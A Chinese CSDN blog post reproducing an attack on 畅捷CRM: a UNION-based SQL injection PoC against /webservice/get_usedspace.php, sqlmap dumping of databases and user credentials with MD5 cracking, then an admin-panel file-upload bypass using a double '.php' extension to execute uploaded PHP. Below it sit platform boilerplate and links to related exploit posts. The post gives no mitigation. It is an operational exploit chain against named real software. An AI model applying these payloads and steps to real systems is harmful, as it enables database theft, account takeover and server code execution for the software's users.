畅捷CRM 存在SQL注入+后台文件上传漏洞

最新推荐文章于 2024-05-11 21:33:09 发布
最新推荐文章于 2024-05-11 21:33:09 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58091216/article/details/128218647
版权

1.我们来到登录页面

2. 我们使用poc,SQL注入漏洞点出在执行/webservice/get_usedspace.php?site_id=,执行的POC,得到回显old6old6old6,证明存在漏洞

poc:         /webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x6f6c6436,0x6f6c6436,0x6f6c6436)--

3. 使用sqlmap进行账号密码发现,通过MD5解密即可得到密码

爆破数据库

爆破表名

获取用户名和密码

4.我们进行登录(SQL注入)

5. 进入后台→客户→点击客户→新建123客户→附件→新建附件→上传内容为phpinfo文件名为123.ma.php→点击123的名称

1.格式为xx.xx.php可绕过上传限制2.内容:<?php phpinfo();?>

 

 

6. 点击123.ma.php,即可解析phpinfo

 

 

MS02423
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
畅捷CRM SQL注入漏洞复现
0xSec
06-13 1586
用友畅捷CRMcreate_site.php处存在SQL时间盲注,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
漏洞复现】用友畅捷通T+ SQL注入漏洞
2301_79099363的博客
07-13 1351
漏洞复现】用友畅捷通T+ SQL注入漏洞
畅捷通T+SQL注入漏洞
holyxp的博客
07-27 811
畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。畅捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
用友畅捷通T+ keyEdit sql注入漏洞
最新发布
Keepb1ue的博客
05-11 343
畅捷通 T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括:采购管理、库存管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交化、移动化、电子商务、互联网信息订阅等元素,为企业打造全新的生意模式、管理模式、工作模式。
实战 - 畅捷CRM get_usedspace.php SQL注入漏洞
HAKUNAMATATATTA的博客
04-25 307
畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息。
CRMEB多端多语言系统文件0Day代审历程
weixin_43526443的博客
09-05 2143
这两天攻防中,某政局子公司官网后台采用的CRMEB开源商城CMS,挺奇葩,别问怎么总让我碰到这种东西,我也不知道,主打的就是一个魔幻、抽象。最后通过审代码,绕过历史漏洞修复的补丁(文章内容可能有点少,没办法,这个代审快到了我只用了5秒)
畅捷CRM亮点及操作说明.pptx
09-21
畅捷CRM】是一款专为小企业设计的智能客户关系管理系统,旨在提升企业的销售业绩和团队协作效率。这款系统包含了线索管理、客户管理、商机跟踪、报价、订单、收款、服务、销售分析等多个核心功能,同时也提供了...
畅捷CRM115产品介绍--XXXX07.pptx
09-21
畅捷CRM115产品介绍】是一款专为小企业设计的智能化客户关系管理系统,旨在提升销售业绩,解决企业管理中的诸多挑战。这款产品由畅捷通信息技术股份有限公司于2012年7月推出,主要关注协同销售和内部效率的提升。 ...
畅捷CRM115产品白皮书(功能及技术介绍)-.docx
02-16
畅捷CRM115产品白皮书(功能及技术介绍)-.docx
网安笔记--SQL注入、XSS、文件文件包含。
Pqc010101的博客
08-14 347
②在可以进行输入的地方(如:输入框、留言板等)输入一些恶意脚本,观察是否会弹出警告框。权限绕过、密码找回、验证码自动识别、客户端回显、绕过、暴力破解、重复使用、支付逻辑漏洞、未进行登录凭证验证。①信息收集相关的URL、页面结构、可输入的字段、XSS漏洞。1、原理:在WEB页面中写入恶意脚本使用户浏览页面时获取控制用户浏览器操作的攻击方式。②通过文件等手段在网站根目录下入恶意文件。2、过滤alert()、prompt()、confirm()。2、常见绕过方式(Windows、Linux)
Web安全 SQL注入 || 文件漏洞.(拿到服务器的最高权限.)
网络安全领域___专研者.
02-07 5108
本文章是DVWA靶场来模拟,所有答案均为个人想法.(有更好的答案可以评论.) 内容有:(1)SQL注入方式(sqlmap工具的利用)通过SQL注入漏洞一步步拿到管理员后台的账号和密码.(2)寻找网站后台的登陆页面.(3)一句话木马的编写.(4)通过一句话木马连接服务器,并拿到服务器的权限.(5)文件技巧和绕过一些比较简单的限制.(6)随意下载和上服务器的文件.(7)远程连接控制服务器.
原创:APT之网站SQL注入导致的文件任意上
08-24
原创:APT之网站SQL注入导致的文件任意上
SQL注入---文件+Webshell
zhoutong2323的博客
04-06 767
Webshell是指一种利用Web漏洞获取远程操作权限的工具或脚本,Webshell通常隐藏在Web应用程序的后台目录中,攻击者通过利用一些已知的或未知的漏洞,将Webshell上到服务器中。一旦成功部署Webshell,攻击者可以通过浏览器或专门的管理工具对服务器进行远程操控,并执行任意操作。
SQL注入写webshell
柠檬i的博客
08-06 642
`INTO OUTFILE`是MySQL中用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统中的指定文件
【复现】畅捷通T-Plus SQL注入漏洞_68
fushuang333的博客
04-08 599
【复现】畅捷通T-Plus SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
用友畅捷CRM存在默认空口令漏洞
nnn2188185的博客
04-23 427
用友畅捷CRM存在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。
SQL 注入漏洞详解
m0_60571990的博客
12-19 3676
SQL 注入漏洞详解
安全攻防六:SQL注入,明明设置了强密码,为什么还会被别人登录
运维大湿兄的博客
04-11 1312
在正文之前,让我们先来看一个案例。某天,当你在查看应用的管理后台时,发现有很多异常的操作。接着,你很快反应过来了,这应该是黑客成功登录了管理员账户。于是,你立刻找到管理员,责问他是不是设置了弱密码。管理员很无辜地表示,自己的密码非常复杂,不可能泄漏,但是为了安全起见,他还是立即修改了当前的密码。奇怪的是,第二天,黑客还是能够继续登录管理员账号。问题来了,黑客究竟是怎么做到的呢?你觉得这里面的问题究...
畅捷crm v11.5安装包
10-30
畅捷CRM V11.5是一款用于企业客户关系管理的软件,它提供了销售、市场营销、客户服务等功能,帮助企业提升销售业绩和客户满意度。要安装畅捷CRM V11.5,首先需要下载安装包。安装包通常可以从畅捷CRM官方网站或授权的软件下载网站上获取。 下载安装包后,双击运行安装程序。安装程序会引导用户完成安装过程。在安装过程中,用户需要选择安装目录,一般建议选择系统盘下的Program Files文件夹。接下来,用户需要阅读并同意软件的许可协议,在安装过程中会提供相应选项。 安装过程需要一定时间,请耐心等待。安装完成后,用户可以在开始菜单中找到畅捷CRM V11.5的快捷方式。点击快捷方式,即可打开软件。 在使用畅捷CRM V11.5之前,用户还需要进行一些配置和设置。首先,用户需要输入许可证号进行激活。其次,用户需要设置数据库连接信息,包括数据库名称、用户名和密码等。此外,还可以进行其他一些个性化设置,如选择显示语言、修改主题等。 安装完成并进行相关配置后,用户就可以开始使用畅捷CRM V11.5了。登录软件后,可以根据需要使用不同的功能模块,如销售管理、市场营销、客户服务等。用户可以根据实际需求进行数据录入、报表生成、任务分配等操作。 总的来说,畅捷CRM V11.5的安装过程相对简单,但用户需要注意选择合适的安装路径并进行相关配置和设置。安装完成后,用户就可以充分利用畅捷CRM V11.5提供的功能,提升企业的销售和客户管理效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值